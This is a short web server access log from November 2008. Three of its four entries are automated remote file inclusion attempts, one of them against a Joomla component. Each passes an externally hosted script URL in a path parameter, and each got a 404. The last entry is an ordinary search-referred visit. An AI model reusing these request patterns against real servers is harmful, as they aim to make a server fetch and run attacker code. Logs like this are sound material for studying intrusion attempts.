213.251.154.174 - - [03/Nov/2008:03:41:53 -0600] "GET /logs/access_log.1208304000//?path%5Bdocroot%5D=http://www.kampeermarkt.com/banner/idv6.txt???? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
203.146.26.91 - - [03/Nov/2008:03:42:13 -0600] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.dumkerng.com/eshop/id.txt?????? HTTP/1.1" 404 352 "-""libwww-perl/5.79"
203.146.26.91 - - [03/Nov/2008:03:42:13 -0600] "GET //administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.dumkerng.com/eshop/id.txt?????? HTTP/1.1" 404 347 "-""libwww-perl/5.79"
213.84.107.20 - - [03/Nov/2008:03:42:44 -0600] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://www.google.com/search?q=vintage+flash+&rls=com.microsoft:nl:IE-SearchBox&ie=UTF-8&oe=UTF-8&sourceid=ie7&rlz=1I7GGLR""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
